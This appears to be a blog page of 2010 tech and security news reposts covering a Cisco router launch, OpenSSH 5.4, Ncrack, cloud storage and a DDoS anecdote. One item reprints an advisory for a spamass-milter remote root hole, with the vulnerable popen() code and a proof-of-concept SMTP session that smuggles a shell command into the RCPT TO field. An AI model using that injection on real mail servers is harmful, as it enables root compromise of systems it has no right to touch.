Mar 9 2010

The Cisco CRS-3 Carrier Routing System

Cisco (NASDAQ: CSCO) today announced a major advancement in Internet networking — the Cisco® CRS-3 Carrier Routing System (CRS) — designed to serve as the foundation of the next-generation Internet and set the pace for the astonishing growth of video transmission, mobile devices and new online services through this decade and beyond.

With more than 12 times the traffic capacity of the nearest competing system, the Cisco CRS-3 is designed to transform the broadband communication and entertainment industry by accelerating the delivery of compelling new experiences for consumers, new revenue opportunities for service providers, and new ways to collaborate in the workplace.

Overview:

* The Cisco CRS-3 triples the capacity of its predecessor, the Cisco CRS-1 Carrier Routing System, with up to 322 Terabits per second, which enables the entire printed collection of the Library of Congress to be downloaded in just over one second; every man, woman and child in China to make a video call, simultaneously; and every motion picture ever created to be streamed in less than four minutes.

* The Cisco CRS-3 enables unified service delivery of Internet and cloud services with service intelligence spanning service provider Internet Protocol Next-Generation Networks (IP NGNs) and the data center. The Cisco CRS-3 also provides unprecedented savings with investment protection for the nearly 5,000 Cisco CRS-1 systems deployed worldwide. Cisco’s cumulative investment in the Cisco CRS family is $1.6 billion, further underscoring the company’s commitment.

* AT&T, one of the world’s largest telecommunications companies, recently tested the Cisco CRS-3 in a successful completion of the world’s first field trial of 100-Gigabit backbone network technology, which took place in AT&T’s live network between New Orleans and Miami. The trial advances AT&T’s development of the next generation of backbone network technology that will support the network requirements for the growing number of advanced services offered by AT&T to consumer and business customers, both fixed and mobile.

* The Cisco CRS-3 is currently in field trials, and its pricing starts at $90,000 U.S.

Highlights and Capabilities for the Next-Generation Internet:

* Unmatched Scale: With a proven multi-chassis architecture, the Cisco CRS-3 can deliver up to 322 Tbps of capacity, more than tripling the 92 Tbps capacity of the Cisco CRS-1 and representing more than 12 times the capacity of any other core router in the industry.
* Unique Core and Data Center/Cloud Services Intelligence: In addition to raising capacity requirements, the growth of mobile and video applications is creating new multidirectional traffic patterns as the data center cloud emerges. The new Cisco Data Center Services System provides tight linkages between the Cisco CRS-3, Cisco Nexus family and Cisco Unified Computing System (UCS) to enable unified service delivery of cloud services. This intelligence also includes carrier-grade IPv6 (CGv6) and core IP/MPLS technologies that permit new IP NGN architectural efficiencies required to keep pace with the rapidly growing cloud services market. Unique capabilities include:
  o Network Positioning System (NPS): provides Layer 3 to 7 application information for the best path to content, improving consumer and business experiences while reducing costs.
  o Cloud virtual private network (VPN) for Infrastructure as a Service (IaaS): enables ‘pay-as-you-go’ for compute, storage and network resources by automating Cisco CRS-3 and Cisco Nexus inter-data center connections for Cisco UCS.
* Unprecedented Savings: The Cisco CRS-3 offers dramatic operational expense savings and up to 60 percent savings on power consumption compared to competitive platforms. The Cisco CRS-3 also delivers significant capital expenditures savings and investment protection for existing Cisco CRS-1 customers. The new capabilities in the platform can be achieved by reusing the existing chassis, route processors, fans and power systems with the addition of new line cards and fabric. These upgrades can be performed in-service and be provided by Cisco Services to ensure a smooth transition.
* Silicon Innovation: The Cisco CRS-3 is powered by the new Cisco QuantumFlow Array Processor, which unifies the combined power of six chips to work as one, enabling unprecedented levels of service capabilities and processing power. Making this implementation even more unique is its ability to deliver capabilities with a fraction of the power required by lesser performing chipsets. The Cisco QuantumFlow Array chipset was designed to provide the new system the ability to scale with the ever increasing demands being placed on the IP NGN by the many different applications and billions of devices being used by both businesses and consumers in the Zettabyte era.

Source


Mar 9 2010

OpenSSH 5.4 couples standard local input with server ports

The development team behind secure shell server OpenSSH have released version 5.4, which includes a range of new functions and fixes a number of bugs in the previous version.

Following a transition period of more than 10 years, OpenSSH 5.4 finally disables the old SSH protocol version 1 by default. The legacy protocol, which is no longer considered secure, can still be enabled by adjusting the appropriate setting in the configuration file. Where certificates are used to authenticate users and hosts, version 5.4 offers a new minimal OpenSSH certificate format. User keys can be revoked with the new RevokedKeys option, and host keys can be revoked in the known_hosts file.

Using the -W switch and a host:port argument, OpenSSH 5.4 can be started in netcat mode, which connects the local client’s standard input and output (stdio) to a port on a remote machine. The SFTP server, which provides FTP-like file transfer, can now be run in read-only mode so that clients cannot modify files, and can, if required, be given an explicit umask at the command line for the files it creates. The SFTP client now has tab completion for commands and paths and supports recursive get and put commands, which allow entire file trees to be transferred between client and server.

Source


Mar 8 2010

Spamassassin Milter Plugin Remote Root

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definitely seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command as the root user remotely.
If spamass-milter is run with the expand flag (-x option), it runs popen() on a command line that includes the attacker-supplied recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
    struct context *sctx = (struct context*)smfi_getpriv(ctx);
    SpamAssassin* assassin = sctx->assassin;
    FILE *p;
#if defined(__FreeBSD__)
    int rv;
#endif

    debug(D_FUNC, "mlfi_envrcpt: enter");

    if (flag_expand)
    {
        /* open a pipe to sendmail so we can do address
           expansion */

        char buf[1024];
        char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
        snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
        /* XXX possible buffer overflow here // is this a joke ?! */
        sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

        debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
        rv = pthread_mutex_lock(&popen_mutex);
        if (rv)
        {
            debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
            abort();
        }
#endif

        p = popen(buf, "r");    /* [1] */
        if (!p)
        {
            debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
            assassin->expandedrcpt.push_back(envrcpt[0]);
            /* excerpt ends here; the function continues in the original source */

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:”|touch /tmp/foo”
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Source


Mar 8 2010

Security pros doubt their network-based security

Brocade’s “man-on-the-street” survey at this week’s RSA conference in San Francisco, revealed that 47 percent of respondents believe their network security solutions are less than 25 percent effective in thwarting security threats. Given the frequency of new attacks on networks every day, it’s clear IT security professionals aren’t feeling prepared.

Nearly 20 percent of those polled believe their company’s security policies that deal with threats or data leaks are not being enforced effectively, while 80 percent believe the policies are only being “somewhat enforced.” Regardless of how ironclad a company’s security policies are, enforcing them 100 percent of the time is impossible, and gaps in enforcement can expose a company to outside threats unnecessarily.

When asked about sources of security threats and breaches, 48 percent of those polled identified individuals within their organization providing or selling sensitive information to competitive companies as their most serious security concern; this was followed by concerns about threats posed by foreign governments (15%) and hacking attacks by cyber criminals (10%). Despite the constant threat of foreign entities and governments infiltrating U.S. companies that have made headlines, most security executives’ fears are overwhelmingly focused on internal competitive threats vs. a malicious foreign attack.

Another interesting finding revealed that nearly 40 percent of those surveyed felt background checks on employees were ineffective in determining if that person could be a potential spy for a competitor or foreign government.

The survey polled 144 conference attendees that are involved in the IT security decision making process within a wide variety of industries including networking manufacturing, education, software, healthcare, telecommunications, government and finance.

Source


Mar 4 2010

Ncrack – High Speed Network Authentication Cracking Tool

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients.

Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more.

Ncrack was started as a “Google Summer of Code” project in 2009. While it is already useful for some purposes, it is still unfinished, alpha-quality software. It is released as a standalone tool; be sure to read the Ncrack man page to fully understand Ncrack usage.

Source


Feb 24 2010

Open Source NoSQL Databases

For almost a year now, the idea of “NoSQL” has been spreading due to the demand for relational database alternatives. Maybe the biggest motivation behind NoSQL is scalability. Relational databases don’t lend themselves well to the kind of horizontal scalability that’s required for large-scale social networking or cloud applications, and ORMs can abstract away the impedance mismatch only so much. In other cases, companies just don’t need as many of the complex features and rigid schemas provided by relational databases. Most people are not suggesting that we all ditch the RDBMS; in fact, many companies don’t really need to switch, and relational databases will probably be necessary for many applications years and years from now. In essence, NoSQL is a movement that aims to re-examine the way we structure data and draw attention to innovation in hopes of finding the solution to the next generation’s data persistence problems.

Check the source for details on various types of NoSQL.

Source


Feb 23 2010

Yes it is possible to resource starve a Cloud Computer

Over the weekend, my cloud computing infrastructure survived a major hacking attack. Here is what happened and what it took to recover it.

This weekend my servers out in the cloud space fended off a major hacking attack across two of the systems that I have given the public access to use them. The attack started simply on Friday night as a simple series of scans to see if there was anything in the IP space that I am using. This is the fairly standard attack pattern that many information security people see every day. Thinking that this was normal I closed up shop on Friday and went home.

On Sunday I got an alert from the system that it had hung, and when I went to take a look at it using HTTP and SFTP the computer simply would not respond; there was no way to access it. In the control panel provided by the company I use for cloud hosting, I simply rebooted the box, thinking that it was hung on a process that was keeping the box from being accessed. Over Sunday night, I got three more alerts that the box had hung.

Monday morning when I went into work I rebooted the box again (this is a low priority box with almost no regular use over the weekend) and dove into the error logs for the box.

Over the Saturday-Sunday time period someone had seriously tried to get into the computer. Over 250 gigs of access logs and over 300 gigs of error logs had almost consumed the disk space that I was using. The computer was not simply hung on a process; it had been resource starved, because during the hacking attack the hacker had hit the system so hard that there were no more ports open to make a legitimate connection. Towards the end of the attack (Sunday night) they had hit the computers with what looks like a simple denial of service attack.

My thoughts on this are that my computer survived and came back to operations with a simple reboot of the cloud computer to free up resources that had been consumed during the attack. No data was lost or stolen from the system, and its role is to deliver multimedia and provide data back to a Learning Management System. This meant the loss of some ability for the LMS, but nothing that would have killed the entire system.

The 300 gigs of error logs is overkill; the assumption was that at some point the hacker or hackers got angry enough that they could not get into the system that they simply did a denial of service against the box, aiming to resource starve the system and cause problems for the system administrator over the weekend. I do not think they knew it was on the cloud, or that it was a simple matter of rebooting the box to restore services.

The hacker or hackers had failed in getting into the box, which is good, but resorted to DDOS to cause resource starvation as a final act. I do not think we are dealing with a true professional, but I do think we are dealing with a person who is a step above a script kiddy. They had access to an awesome level of firepower for their DDOS, we logged thousands of IP’s Sunday night. My belief on this one is that the person or persons had access to a botnet or a very large number of compromised systems to make this work.

I paid 20 cents a gig in bandwidth costs for the attack, with the 500 gigs of traffic roughly aimed at the system according to my monitor I paid 100 dollars to my cloud service provider for bandwidth consumed during the attack.

I only had temporary loss of one system because of the way that we distributed the cloud architecture across multiple systems in different data centers. As users switched over to different data centers, the system performed as architected, people were able to get their data over the weekend and nothing was truly slowed down or otherwise inaccessible during the attack.

It took two hours to go through the log files on the system to see what had happened. It took 15 minutes to generate the report to IT. This is literally the quickest I have ever gone through an attack, with clean up and with log analysis ever. It is also the cheapest attack I have ever dealt with in terms of loss or dollar costs associated with an attack ever. Which made for a fun hacking attack with a ton of data to use in the classroom and share. The good part is that a distributed architecture in this case worked which validates the way we built the cloud based system with fail over in mind, not necessarily a hacking attack induced failure of a system.

It is possible to attack a cloud computing system, and it is possible to resource starve a cloud computer, but in the longer run survivability and the ability to get to data relies on the architecture that the system was initially built around. If you are building a cloud space for your company, think in terms of survivability and fail over if a system in your cloud space fails for any reason and how to recover and still present data to the end user. Hacking attacks happen, and hackers will get angry and try to DDOS your site off the planet, how you architect your cloud space and cloud services will help you survive hackers as well as the occasional other failures in the system.

Source


Feb 9 2010

Startup links VMware with Amazon to create secure cloud storage

A storage startup called Nasuni is unveiling a virtual NAS file server that runs on VMware and connects customers to cloud platforms such as Amazon’s Simple Storage Service, adding encryption to enhance security and several features to improve performance.

Nasuni was founded last year and on Tuesday is announcing the beta version of its Nasuni Filer – a so-called “cloud storage gateway.” Target customers are mid-sized companies who are interested in cloud storage, but are concerned about exposing sensitive data or suffering from high latency.

“We connect our customers to partners, people like Iron Mountain and Amazon that provide cloud storage, and we are delivering it as a file server in your virtual environment,” says Nasuni founder and CEO Andres Rodriguez, who previously founded Archivas, an online storage management software vendor acquired by Hitachi Data Systems three years ago.

Nasuni is based in Natick, Mass., with 18 employees, and has $8 million in first-round funding from North Bridge Venture Partners and Sigma Partners. Rodriguez says Nasuni has eight customers in alpha mode and is now offering the filer in a free public beta.

Nasuni’s NAS file server runs in a VMware virtual machine and integrates with either Amazon S3 or Iron Mountain remote storage services, while providing features such as encryption, caching, deduplication, automatic provisioning, and synchronous snapshots.

Accessing cloud storage introduces latency, Rodriguez says, but Nasuni allows users to work with a local cache, speeding up access to data.

“It’s quite clever,” says IDC analyst Laura DuBois. “It does address security concerns in the form of encryption of data in flight and at rest, and it also certainly addresses the concerns around availability.”

Nasuni is one of many startups building software and services that add capability to cloud platforms such as Amazon. For example, the company RightScale was founded to help customers build and clone virtual servers and manage storage in the cloud, and Symantec offers storage management for Amazon customers.

Nasuni will make its product generally available in the spring, and add more partners before doing so, according to Rodriguez. Nasuni will start charging customers after the beta trial, with fees starting around $250 a month. Although two vendors will be involved in each sale, customers would receive just one bill, which could come either from Nasuni or a partner depending on the billing model, he says.

Source


Feb 4 2010

Cisco backdoor still open

The “backdoors” that Cisco and other networking companies implement in their routers and switches for lawful intercept are front and center again at this week’s Black Hat security conference. A few years ago, they were a cause célèbre in some VoIP wiretapping arguments and court rulings.

This time, an IBM researcher told Black Hat conference attendees that these openings can still expose information about us to hackers and allow them to “watch” our Internet activity. Backdoors are implemented in routers and switches so law enforcement officials can track the Internet communications and activity of an individual or individuals under surveillance. They are required by law to be incorporated in devices manufactured by networking companies and sold to ISPs.

In this report from Forbes, IBM Internet Security Systems researcher Tom Cross demonstrated how easily the backdoor in Cisco IOS can be exploited by hackers. When they attempt to gain access to a Cisco router through it, they are not blocked after multiple failed access attempts, nor is an alert sent to an administrator. Any data collected through the backdoor can be sent anywhere, not merely to an authorized user, Forbes reports.

What’s more, an ISP is not able to perform an audit trail on whoever tried to gain access to a router through the backdoor – that nuance was intended to keep ISP employees from detecting the intercept and inadvertently tipping off the individual under surveillance. But according to IBM’s Cross, any authorized employee can use it for unauthorized surveillance of users and those privacy violations cannot be tracked by the ISP.

Cisco said it is aware of Cross’s assertions and is taking them under consideration. To Cisco’s credit, it is the only networking company that makes its lawful intercept architecture public, according to the recommendations of the IETF, the Forbes story states. Other companies do not, which means they may be susceptible to the same security flaws, or worse.

Source


Feb 3 2010

Accusations Fly Over Voice Encryption Hack

German encryption firm SecurStar has strenuously denied being behind an apparently independent test of voice encryption products that found many of its rivals could be hacked using a $100 phone-tapping program.

In a blog on the subject, Fabio Pietrosanti, founder and CTO of Swiss encryption startup Khamsa, alleges that a supposedly independent test of 15 encryption products was in fact a marketing exercise designed to publicise one of only three products to pass the hacking test, SecurStar’s PhoneCrypt.

The tests by an anonymous researcher, ‘Notrax’, found that all but three programs and hardware products looked at could be bypassed by installing a simple wiretapping Trojan called FlexiSPY to record voice output without the programs giving the user any indication that security had been compromised.

Khamsa’s own GSM security software was not part of the test but the encryption technology it uses, ZRTP, came in for criticism. The moving force behind that system and its implementation in a program called Zfone is encryption pioneer and inventor of Pretty Good Privacy, Phil Zimmermann, who is also listed as being on Khamsa’s scientific board.

According to Pietrosanti, the unnamed ‘Notrax’ was subsequently traced to an IP address connected to SecurStar after the individual followed a link embedded in a blog Pietrosanti had posted.

“The SecurStar GmbH PBX is open on the internet, it contains all the names of their employees and confirms to us that the author of http:/infosecurityguard.com [the domain used to post the original test] is that company and is the anonymous hacker called Notrax,” says Pietrosanti.

He adds that SecurStar also appeared to be logging Google keywords related to the topic so as to have some idea of how the tests were being discussed.

When contacted, SecurStar denied any involvement with the tests. “We do not have anything to do with these tests and I have no idea about him [Notrax],” said SecurStar CEO, Wilfried Hafner in a call to Techworld.

According to Hafner, the reason Notrax appeared to use a SecurStar IP address was probably that the individual concerned had used the company’s anonymity service, which hides real IP addresses behind the company’s own.

“We have two million people using this product. Or he may have been an old customer of ours,” said Hafner.

As far as they go, the tests do appear to find a legitimate weakness in the programs under test even if a connection to one of the companies involved would represent a huge conflict of interest and discredit them in the eyes of the security community. Pietrosanti is certainly correct to say that researchers are normally keen to be identified with their testing, something ‘Notrax’ has avoided doing so far.

Source